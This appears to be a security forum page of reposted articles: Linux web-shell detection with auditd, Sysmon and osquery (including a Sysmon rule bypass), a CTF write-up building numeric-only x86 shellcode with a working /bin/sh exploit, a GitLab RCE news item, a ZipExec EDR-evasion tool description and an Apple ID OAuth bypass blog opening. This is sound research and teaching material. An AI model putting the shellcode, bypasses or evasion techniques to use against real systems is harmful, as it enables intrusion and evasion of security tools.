name="backdoor_shell.php" the output file key="www_changes" the key of the auditd alert that was fired proctitle=63757... is the hex encoded title of the process which is our original curl command Notes on file integrity monitoring for detecting web shells There are other ways to check. For example, if there is version control (like git), you can compare the current state with a known good state and investigate the differences. However, if there are folders where we expect specific files to be written and modified often, such as upload directories, then file integrity monitoring might not be fully effective. We might have to fine-tune this alert and try to exclude these upload directories to reduce noise, but how would you detect web shells uploaded within the upload directory! We need to look for more effective means of detecting web shells. 1.4 Detection: Looking for command execution for www-data using auditd When we run webservers such as nginx the service will run under the user www-data . On regular operations, we should not expect to see that user running commands such as whoami or ls However, if there was a web shell, these are some of the commands we are most likely going to see. Therefore, we should try to use auditd to detect these. Here is an auditd rule that will look for execve syscalls by www-data (euid=33) and we tag this as detect_execve_www -a always,exit -F arch=b64 -F euid=33 -S execve -k detect_execve_www -a always,exit -F arch=b32 -F euid=33 -S execve -k detect_execve_www We run the following commands on our webshell whoami id pwd ls -alh We get the following logs from auditd as parsed by auditbeats. Here is an example of a raw auditd log for whoami type=SYSCALL msg=audit(1637597946.536:10913): arch=c000003e syscall=59 success=yes exit=0 a0=7fb62eb89519 a1=7ffd0906fa70 a2=555f6f1d7f50 a3=1 items=2 ppid=7182 pid=13281 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" subj==unconfined key="detect_execve_www", type=EXECVE msg=audit(1637597946.536:10913): argc=3 a0="sh" a1="-c" a2="whoami", type=PATH msg=audit(1637597946.536:10913): item=0 name="/bin/sh" inode=709 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PATH msg=audit(1637597946.536:10913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1449 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0, type=PROCTITLE msg=audit(1637597946.536:10913): proctitle=7368002D630077686F616D69Appendix This allows us to note: euid=33, uid=33 which is www-data comm="sh" exe="/usr/bin/dash” the shell argsc=3 a0="sh" a1="-c" a2="whoami" the commands run on the shell key="detect_execve_www" the key of the auditd alert that was fired Note regarding detect_execve_www Let’s say you decide to use the default rules found in https://github.com/Neo23x0/auditd/blob/master/audit.rules If you try to use ready-made detection rules such as those that come with sigma then you might try to use lnx_auditd_web_rce.yml. If you use this query using the rules from Neo23x0 then you will fail to detect any web shells. This is because the detection rule is detection: selection: type: 'SYSCALL' syscall: 'execve' key: 'detect_execve_www' condition: selection Notice that this filters for the key detect_execve_www but this exact key is not defined anywhere in Neo23x0’s audit.rules ! This is why you should always test your configurations and see if it detects the known bad. In the Neo23x0’s rules, the closest thing you might get are commented out by default ## Suspicious shells #-w /bin/ash -p x -k susp_shell #-w /bin/bash -p x -k susp_shell #-w /bin/csh -p x -k susp_shell #-w /bin/dash -p x -k susp_shell #-w /bin/busybox -p x -k susp_shell #-w /bin/ksh -p x -k susp_shell #-w /bin/fish -p x -k susp_shell #-w /bin/tcsh -p x -k susp_shell #-w /bin/tclsh -p x -k susp_shell #-w /bin/zsh -p x -k susp_shell In this case, our web shell used /bin/dash because it is the default shell used by /bin/shin the current VM I tested this on. So the relevant rule would be -w /bin/dash -p x -k susp_shell But this relies on the usage of /bin/dash buit if the web shell is able to use other shells, then this specific alert will fail. Test your auditd rules on specific scenarios to ensure that it works as expected. For more information on how to write rules for auditd see: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-defining_audit_rules_and_controls https://www.redhat.com/sysadmin/configure-linux-auditing-auditd 1.5 Detection: Looking for command execution for www-data using sysmon MSTIC-Sysmon has two rules for this found individually: T1505.003 T1059.004 Where we can see: Process creation using /bin/bash, /bin/dash, or/bin/sh Process creation with the parent process dash or nginx or … containing and the current command is one of whoami , ifconfig , /usr/bin/ip , etc. If we run whoami in the setup we have, the first rule that will be triggered would T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell because of the order of the rules. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> <Version>5</Version> <Channel>Linux-Sysmon/Operational</Channel> <Computer>sysmon-test</Computer> <Security UserId="0"/> </System> <EventData> <Data Name="RuleName">TechniqueID=T1059.004,TechniqueName=Command and Scriptin</Data> <Data Name="UtcTime">2021-11-23 14:06:07.116</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-2d4e-bd5574550000}</Data> <Data Name="ProcessId">11662</Data> <Data Name="Image">/usr/bin/dash</Data> <Data Name="FileVersion">-</Data> <Data Name="Description">-</Data> <Data Name="Product">-</Data> <Data Name="Company">-</Data> <Data Name="OriginalFileName">-</Data> <Data Name="CommandLine">sh -c whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="TerminalSessionId">4294967295</Data> <Data Name="IntegrityLevel">no level</Data> <Data Name="Hashes">-</Data> <Data Name="ParentProcessGuid">{00000000-0000-0000-0000-000000000000}</Data> <Data Name="ParentProcessId">10242</Data> <Data Name="ParentImage">-</Data> <Data Name="ParentCommandLine">-</Data> <Data Name="ParentUser">-</Data> </EventData> </Event> Here we see /bin/dash being executed that is why the rule was triggered. Afterwards, the rule T1505.003,TechniqueName=Server Software Component: Web Shell is triggered because of whoami . Here is the log for it. I’ve removed some fields for brevity. <Event> <System> <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/> <EventID>1</EventID> </System> <EventData> <Data Name="RuleName">TechniqueID=T1505.003,TechniqueName=Serv</Data> <Data Name="UtcTime">2021-11-23 14:06:07.118</Data> <Data Name="ProcessGuid">{717481a5-f54f-619c-c944-fd0292550000}</Data> <Data Name="ProcessId">11663</Data> <Data Name="Image">/usr/bin/whoami</Data> <Data Name="CommandLine">whoami</Data> <Data Name="CurrentDirectory">/var/www/html</Data> <Data Name="User">www-data</Data> <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data> <Data Name="LogonId">33</Data> <Data Name="ParentProcessId">11662</Data> <Data Name="ParentImage">/usr/bin/dash</Data> <Data Name="ParentCommandLine">sh</Data> <Data Name="ParentUser">www-data</Data> </EventData> </Event> Now with this knowledge, we can bypass T1505.003 sysmon rule. By running system("/bin/bash whoami") so that the parent image of the whoami command would not be dash . This would trigger two T1059.004 alerts. Just for an exercise, if we want to replicate our detect_execve_www in sysmon, we can use the following rule <RuleGroup name="" groupRelation="or"> <ProcessCreate onmatch="include"> <Rule name="detect_shell_www" groupRelation="and"> <User condition="is">www-data</User> <Image condition="contains any">/bin/bash;/bin/dash;/bin/sh;whoami</Image> </Rule> </ProcessCreate> </RuleGroup> And if we want to do basic file integrity monitoring with sysmon we can use <FileCreate onmatch="include"> <Rule name="change_www" groupRelation="or"> <TargetFilename condition="begin with">/var/www/html</TargetFilename> </Rule> </FileCreate> For more information about writing your own sysmon rules you can look at: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-the-rules-about-rules/ba-p/733649 https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml https://github.com/microsoft/MSTIC-Sysmon 1.6 Hunting for web shells using osquery For osquery, we might not be able to “find” the web shells itself, but we might be able to find evidence of the webshell. If an attacker uses a web shell, it is possible they will try to establish a reverse shell. If so, we should be an outbound connection from the web server to the attacker. SELECT pid, remote_address, local_port, remote_port, s.state, p.name, p.cmdline, p.uid, username FROM process_open_sockets AS s JOIN processes AS p USING(pid) JOIN users USING(uid) WHERE s.state = 'ESTABLISHED' OR s.state = 'LISTEN'; This look for processes with sockets that have established connections or has a listening port. +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | pid | remote_address | local_port | remote_port | state | name | cmdline | uid | username | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ | 14209 | | 22 | 0 | LISTEN | sshd | /usr/sbin/sshd -D | 0 | root | | 468 | | 80 | 0 | LISTEN | nginx | nginx: worker process | 33 | www-data | | 461 | | 51434 | 443 | ESTABLISHED | google_guest_ag | /usr/bin/google_guest_agent | 0 | root | | 8563 | | 39670 | 9200 | ESTABLISHED | auditbeat | /usr/share/auditbeat/bin/auditbeat ... | 0 | root | | 17770 | | 22 | 20901 | ESTABLISHED | sshd | sshd: user@pts/0 | 1000 | user | | 17776 | | 51998 | 1337 | ESTABLISHED | bash | bash | 33 | www-data | +-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+ Notice we that we see exposed port 22 and port 80 which is normal. We see outbound connections for some binaries used by GCP (my VM is hosted in GCP) as well as the auditbeat service that ships my logs to the SIEM. We also see an active SSH connection from which might be normal. What should catch your eye is the connection pid =17776. It is an outbound connection to port 1337 running shell by www-data! This is probably an active reverse shell! What’s next We’ve discussed basic of monitoring and logging with sysmon, osqueryu, auditd and auditbeats and we have used the case study of how to detect the creation and usage of web shells. In the next blog post we will go through account creation and manipulation. Appendix A00 Setup nginx and php If you want to try this out on your own VM, you need to first setup an nginx server that is configured to use php. (We follow this guide). You need to install nginx and php sudo apt-get update sudo apt-get install nginx sudo apt-get install php-fpm sudo vi /etc/php/7.3/fpm/php.ini # cgi.fix_pathinfo=0 sudo systemctl restart php7.3-fpm sudo vi /etc/nginx/sites-available/default # configure nginx to use php see next codeblock sudo systemctl restart nginx The nginx config might look something like this server { listen 80 default_server; listen [::]:80 default_server; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { try_files $uri $uri/ =404; } location ~ \\.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm.sock; } } Now you should have a web server listening in port 80 that can run php code. Any file that ends with .php will be run as php code. A01 Setup sysmon for linux For sysmon for linux, I was on Debian 10, so based on https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/ wget -q https://packages.microsoft.com/config/debian/10/prod.list sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list sudo apt-get update sudo apt-get install apt-transport-https sudo apt-get update sudo apt-get install sysmonforlinux I used microsoft/MSTIC-Sysmon git clone https://github.com/microsoft/MSTIC-Sysmon.git cd MSTIC-Sysmon/linux/configs sudo sysmon -accepteula -i main.xml # if you are experimenting and want to see all sysmon logs use # sudo sysmon -accepteula -i main.xml Logs should now be available in /var/log/syslog If you want to add rules to main.xml then you can modify it and then reload the config and restart sysmon sudo sysmon -c main.xml sudo sysmtectl restart sysmon A02 Setup auditbeats and auditd for linux Note: Setting up a local elasticsearch clustering is out of scope of this blog post. Elastic has good documentation for auditbeats: https://www.elastic.co/guide/en/beats/auditbeat/7.15/auditbeat-installation-configuration.html curl -L -O https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-7.15.2-amd64.deb sudo dpkg -i auditbeat-7.15.2-amd64.deb Modify /etc/auditbeat/auditbeat.yml Add the config for elasticsearch output.elasticsearch: hosts: [""] username: "auditbeat_internal" password: "YOUR_PASSWORD" To configure auditd rules, validate location of the audit_rule_files # ... - module: auditd audit_rule_files: [ '${path.config}/audit.rules.d/\*.conf' ] audit_rules: | ## Define audit rules # ... In this case it is in /etc/auditbeat/audit.rules.d/ and I add audit-rules.conf from https://github.com/Neo23x0/auditd/blob/master/audit.rules For some of the custom rules I make I add it in /etc/auditbeat/audit.rules.d/custom.conf Other sources: https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-linux-version-of-the-windows-sysmon-tool/ https://github.com/elastic/integrations/issues/1930 Photo by Brook Anderson on Unsplash Pepe Berba Cloud Security at Thinking Machines| GMON, CCSK | Ex-Machine Learning Researcher and Ex-SOC Engineer Sursa: https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
    1 point
  7. Numeric Shellcode Jan 12, 2021 10 minutes read Introduction In December 2020 I competed in Deloitte’s Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties. One of the final challenges to be released was called numerous presents. This task immediately piqued my interest as it was tagged with the category pwn. The challenge description reads: 600 POINTS - NUMEROUS PRESENTS You deserve a lot of presents! Note: The binary is running on a Ubuntu 20.04 container with ASLR enabled. It is x86 compiled with the flags mentioned in the C file. You can assume that the buffer for your shellcode will be in eax. Tip: use hardware breakpoints for debugging shellcode. Challenge code The challenge is distributed as a .c file with no accompanying reference binary. Personally I’m not a big fan of this approach, the devil is in the details when it comes to binary exploitation, but let’s have a look: #include <stdio.h> // gcc -no-pie -z execstack -m32 -o presents presents.c unsigned char presents[123456] __attribute__ ((aligned (0x20000))); int main(void) { setbuf(stdout, NULL); puts("How many presents do you want?"); printf("> "); scanf("%123456[0-9]", presents); puts("Loading up your presents..!"); ((void(*)())presents)(); } Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and and straight forward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though, the format-string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the numbers 0 till 9 (0x30-0x39). So essentially they are asking us to write a numeric only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only? Long story short: yes it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately though, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario. Diving in If we set up a clean Ubuntu 20.04 VM and apt install build-essential and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main we can see the function pointer invocation looks like this: mov eax, 0x8080000 call eax So indeed, like the challenge description suggested EAX contains a pointer to our input/shellcode. So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long I opted to brute-force generate valid opcode permutations and disassemble+dedup them. Exclusive ORdinary Instructions There was no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory as is often seen with alphanumeric shellcoding. Let’s look at some obviously useful candidates though.. they are all xor operations. 34 xx -> xor al, imm8 30 30 -> xor byte ptr [eax], dh 32 30 -> xor dh, byte ptr [eax] 32 38 -> xor bh, byte ptr [eax] 35 xx xx xx xx -> xor eax, imm32 Ofcourse, any immediate operands have to be in the 0x30-0x39 range as well. But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax to the code/data we want to modify. Changing eax arbitrarily is a bit tricky; but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit) Writing numeric only shellcode is all about expanding your arsenal of primitives, in a way that eventually yields a desired end result. If we were to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first. Bootstrapping If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is being executed. In short, bh = 0xc0 and dh = 0xff. If we start our journey like this: xor byte ptr [eax], dh ; *(u8*)(eax) ^= 0xff (== 0xcf) xor dh, byte ptr [eax] ; dh ^= 0xcf (== 0x30) xor bh, byte ptr [eax] ; bh ^= 0xcf (== 0x0f) We end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well for one, by xor’ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09. To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric only. They start with a 0x00 opcode byte though. But this value can now be carved by xor’ing with dh, which contains 0x30. Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values we can carve any value we want. So let’s say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)). start value = 0x31 0x31 + (0x30 * 2) = 0x91 0x91 + (0x0f * 4) = 0xcd as you can see, with a total of 6 add operations (2 with bh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow, we are only working with 8bit registers. Pages and overall structure Having the ability to turn numeric bytes into arbitrary bytes is a useful capability, but it heavily relies on being able to control eax to pick what memory locations are being altered. Let’s try to think about our eax-changing capabilities for a bit. We have the xor eax, imm32 and xor al, imm8 instructions at our disposal. Of course, the supplied operands to these instructions need to be in the numeric range. By chaining two xor eax, imm32 operations it becomes possible to set a few nibbles in EAX to arbitrary values, while not breaking the numeric-only rule for the operands. By adding an optional xor al, 0x30 to the end we can toggle the upper nibble of the least significant byte of eax to be 0x30. This gives us a nice range of easily selectable addresses. A quick example would look something like this: ; eax = 0x08080000, our starting address xor eax, 0x30303130 ; eax = 0x38383130 xor eax, 0x30303030 ; eax = 0x08080100 xor al, 0x30 ; eax = 0x08080130 Lets treat the lower 16bits of eax as our selectable address space, we have the ability to select addresses in the form of 0x08080xyz where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100 and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f. I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we’re using self-modifying code that needs to be self-modified before it can self-modify (yo dawg). Roughly, the layout of our pages look like this: 000: setup code 100: page_patcher_code_0 (patches shellcode_patcher_code_0) 130: shellcode_patcher_code_0 (patches shellcode) 200: page_patcher_code_1 (patches shellcode_patcher_code_1) 230: shellcode_patcher_code_1 (patches shellcode) ... f00: shellcode that gets modified back into original form This means we can have a maximum of up to 14 patch pages (we lose page 0 to setup code), which doesn’t allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge, and (in general) is enough for staging a larger shellcode. Padding With our limited addressing there’s quite a bit of ‘dead’ space we can’t easily address for modifying. We’ll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32 which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisble by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues. I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address, and the side-effects are mininmal. Another option would’ve been to use the aaa instruction (37), which is exactly 1 byte in size. But it clobbers al in some cases, so I avoided it. Putting it all together Initially while I was developing this method I manually put together these self modifying numeric only contraptions (well, with some help of GNU assembler macro’s).. which works but is quite a painful and error prone process. Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and calculating the optimal amount of mutation instructions for generating the shellcode. Do note, this tool was written with the challenge I was facing. You’ll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my exact tooling. Popping a shell So we’ll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We’ll put the destination buffer right after the stager itself, so there’s no need for trailing nop instructions or control flow divertion. The careful reader will notice I’m not setting edx (which contains the size argument for the read syscall) here since its already set to a big enough value. bits 32 global _start _start: mov ecx, eax ; ecx = eax add ecx, 0xd ; ecx = &_end xor ebx, ebx ; stdin xor eax, eax xor al, 3 ; eax = NR_read int 0x80 _end: That should do the trick. Time to run it through the tool and give it a shot. $ nasm -o stager.bin stager.asm $ xxd stager.bin 00000000: 89c1 83c1 0d31 db31 c034 03cd 80 .....1.1.4... $ python3 numeric_gen.py stager.bin stager_num.bin [~] total patch pages: 14 [>] wrote numeric shellcode to 'stager_num.bin' [~] old length: 13 bytes, new length 3853 (size increase 29638.46%) $ xxd stager_num.bin 00000000: 3030 3230 3238 3530 3030 3035 3031 3030 0020285000050100 00000010: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000020: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000030: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 ... 00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000f00: 3931 3531 3231 3031 3034 3431 32 9151210104412 $ xxd binsh.bin 00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989 1...Phn/shh//bi. 00000010: e389 c1b0 0b52 5153 89e1 cd80 .....RQS.... $ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents How many presents do you want? > Loading up your presents..! id uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) echo w00t w00t ^C Success! As you can see our final numeric shellcode weighs in at 3853 bytes. A little under 4KiB, and well within the allowed limit of 123456 characters. Closing words I hope you enjoyed this article, and I’m eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. 😉 – blasty Sursa: https://haxx.in/posts/numeric-shellcode/
    1 point
  8. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks. Tracked as CVE-2021-22205, the issue relates to an improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3. In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly-accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions. Although the flaw was initially deemed to be a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday. Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In the light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible. "In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
    1 point
  9. Visual editor and API for network environments script generation. Define your network components and download a BASH script creating your setup. root@(none):/# ./netpen.sh ____ _ | _ \ ___ _ _ | |_ ___ _ __ | |_) | / _ \ | | | || __| / _ \| '__| | _ < | (_) || |_| || |_ | __/| | |_| \_\ \___/ \__,_| \__| \___||_| +-----------+------------------------------------+ | Namespace | IPv4 | +-----------+------------------------------------+ | a | (atorouter.dev1) | +-----------+------------------------------------+ | b | (btorouter.dev1) | +-----------+------------------------------------+ | router | (atorouter.dev2) | | | (btorouter.dev2) | +-----------+------------------------------------+ net.ipv4.route.mtu_expires = 15 net.ipv4.conf.all.forwarding = 1 net.ipv6.conf.all.forwarding = 2 net.ipv4.conf.all.forwarding = 1 net.ipv6.conf.all.forwarding = 2 net.ipv4.conf.all.forwarding = 1 net.ipv6.conf.all.forwarding = 2 [ 10.578767] ip (1451) used greatest stack depth: 12224 bytes left [ 10.769523] random: crng init done [ 10.777003] IPv6: ADDRCONF(NETDEV_CHANGE): atorouter.dev1: link becomes ready [ 10.923704] ip (1460) used greatest stack depth: 12096 bytes left [ 11.121881] IPv6: ADDRCONF(NETDEV_CHANGE): btorouter.dev1: link becomes ready root@(none):/# [ 11.578224] IPv6: ADDRCONF(NETDEV_CHANGE): atorouter.dev2: link becomes ready root@(none):/# ip netns exec a ping PING ( 56(84) bytes of data. 64 bytes from icmp_seq=1 ttl=63 time=7.00 ms 64 bytes from icmp_seq=2 ttl=63 time=0.956 ms Project Page: https://github.com/ebirger/netpen.git Source
    1 point
  10. ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms. https://github.com/Tylous/ZipExec
    1 point
  11. Everyone knows what’s inside a computer isn’t really real. It pretends to be, sure, hiding just under the pixels — but I promise you it isn’t. In the real world, everything has a certain mooring we’re all attuned to. You put money in a big strong safe, and, most likely if somehow it opens there will be a big sound, and a big hole. Everything has a footprint, everything has a size, there are always side-effects. As the electrons wiggle, they’re expressing all these abstract ideas someone thought up sometime. Someone had an idea of how they’d dance, but that’s not always true. Instead, there are half-formed ideas, ideas that change context and meaning when exposed to others, and ideas that never really quite made sense. The Alice in Wonderland secret of computers is that the dancers and their music are really the same. It’s easy to mistakenly believe that each word I type is shuffled by our pixie friends along predefined chutes and conveyors to make what we see on screen, when in reality each letter is just a few blits and bloops away from being something else entirely. Sometimes, if you’re careful, you can make all those little blits and bloops line up in a way that makes the dance change, and that’s why I’ve always loved hacking computers: all those little pieces that were never meant to be put together that way align in unintended but beautiful order. Each individual idea unwittingly becomes part of a greater and irrefutable whole. Before the pandemic, I spent a lot of time researching the way web of YouTube, Wikipedia and Twitter meets the other world of Word, Photoshop and Excel to produce Discord, 1Password, Spotify, iTunes, Battle.net and Slack. Here all the wonderful and admittedly very pointy and sharp benefits of the web meet the somewhat softer underbelly of the ‘Desktop Application’, the consequences of which I summarised one sunny day in Miami. I’m not really a very good security researcher, so little of my work sees the light of day because the words don’t always form up in the right order, but my experience then filled me with excitement to publish more. And so, sitting again under the fronds of that tumtum tree, I found more — and I promise you what I found then was as exciting as what I’ll tell you about now. But I can’t tell you about those. Perhaps naïve, it didn’t occur to me before that the money companies give you for your security research is hush money, but I know that now — and I knew that then, when I set out to hack Apple ID. At the time, Apple didn’t have any formal way of paying you for bugs: you just emailed them, and hoped for the best. Maybe you’d get something, maybe you wouldn’t — but there is certainly nothing legally binding about sending an email in the way submitting a report to HackerOne is. That appealed to me. Part 1: The Doorman’s Secret Computer systems don’t tend to just trust each other, especially on the web. The times they do usually end up being mistakes. Let me ask you this: when you sign into Google, do you expect it to know what you watched on Netflix? Of course not. That’s down to a basic rule of the web: different websites don’t default to sharing information to each other. ICloud, then is a bit of a curiosity. It has its own domain, icloud.com, entirely separate from Apple’s usual apple.com yet its core feature is of course logging into your Apple iCloud account. More interestingly still, you might notice that most login systems for, say, Google, redirect you through a common login domain like accounts.google.com, but iCloud’s doesn’t. Behind the looking-glass, Apple has made this work by having iCloud include a webpage that is located on the AppleID server, idmsa.apple.com. The page is located at this address: https://idmsa.apple.com/appleauth/auth/authorize/signin?frame_id=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&language=en_US&iframeId=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&client_id=d39ba9916b7251055b22c7f910e2ea796ee65e98b2ddecea8f5dde8d9d1a815d&redirect_uri=https://www.icloud.com&response_type=code&response_mode=web_message&state=auth-ebog4xzs-os6r-58ua-4k2f-xlys83hd&authVersion=latest Here, Apple is using OAuth 2, a capability based authentication framework. ‘Capability based’ is key here, because it means that a login from Apple.com doesn’t necessarily equate to one from iCloud.com, and also not all iCloud logins are necessarily the same either — that’s how Find My manages to skip a second-factor check to find your phone. This allows Apple to (to some extent) reduce the blast radius of security issues that might otherwise touch iCloud. This is modified, however, to allow the login to work embedded in another page. response_mode=web_message seems to be a switch that turns this on. If you visit the address, you’ll notice the page is just blank. This is for good reason: if anyone could just show the Apple iCloud login page then you could play around with the presentation of the login page to steal Apple user data (‘Redress Attack’). Apple’s code is detecting that it’s not being put in the right place and blanks out the page. In typical OAuth, the ‘redirect_uri’ specifies where the access is being sent to; in a normal, secure form, the redirect uri gets checked against what’s registered for the other, ‘client_id’ parameter to make sure that it’s safe for Apple to send the special keys that grant access there — but here, there’s no redirect that would cause that. In this case the redirect_uri parameter is being used for a different purpose: to specify the domain that can embed the login page. In a twist of fate, this one fell prey to a similar bug to the one from how to hack the uk tax system, i guess, which is that web addresses are extraordinarily hard to compare safely. Necessarily, something like this parameter must pass through several software systems, which individually probably have subtly different ways of interpreting the information. For us to be able to bypass this security control, we want the redirect_uri checker on the AppleID server to think icloud.com, and other systems to think something else. URLs, web addresses are the perfect conduit for this. Messing with the embed in situ in the iCloud page with Chrome Devtools, I found that a redirect_uri of ‘https://abc@www.icloud.com’ would pass just fine, despite it being a really weird way of saying the same thing. The next part of the puzzle is how do we get the iCloud login page into our page? Consult this reference on embed control: X-Frame-Options: DENY Prevents any kind of embedding pros: ancient, everyone supports it cons: the kids will laugh at you; if you want only some embedding, you need some complicated and unreliable logic X-Frame-Options: ALLOW-FROM http://example.com Only allows embedding from a specific place pros: A really good idea from a security perspective cons: was literally only supported by Firefox and Internet Explorer for a short time so using it will probably make you less secure Content-Security-Policy: frame-ancestors Only allows embedding from specific place(s) pros: new and cool, there are probably TikToks about how to use it; prevents embeds-in-embeds bypassing your controls 